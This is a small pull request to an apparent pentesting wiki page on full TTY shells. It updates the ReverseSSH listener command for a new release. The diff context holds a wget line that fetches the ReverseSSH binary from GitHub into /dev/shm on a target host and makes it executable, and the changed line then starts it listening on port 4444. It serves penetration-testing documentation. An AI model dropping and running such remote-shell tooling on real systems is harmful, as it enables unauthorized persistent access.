### PR TITLE
Adapt usage of ReverseSSH to latest release

### DIFF
--- a/shells/shells/full-ttys.md
+++ b/shells/shells/full-ttys.md
@@ -49,7 +49,7 @@ Below is an example for `x86` with upx-compressed binaries. For other binaries, 
 # Drop it via your preferred way, e.g.
 wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
 
-/dev/shm/reverse-ssh -v -l :4444
+/dev/shm/reverse-ssh -v -l -p 4444
 ```
 
 * \(2a\) Linux target:


### PR DESCRIPTION
Hi @carlospolop 

I just released [version 1.2.0 of ReverseSSH](https://github.com/Fahrj/reverse-ssh/releases/tag/v1.2.0) with some additional features and a _slightly_ changed user interface.

This MR accounts for these changes and updates the listening command to the current usage.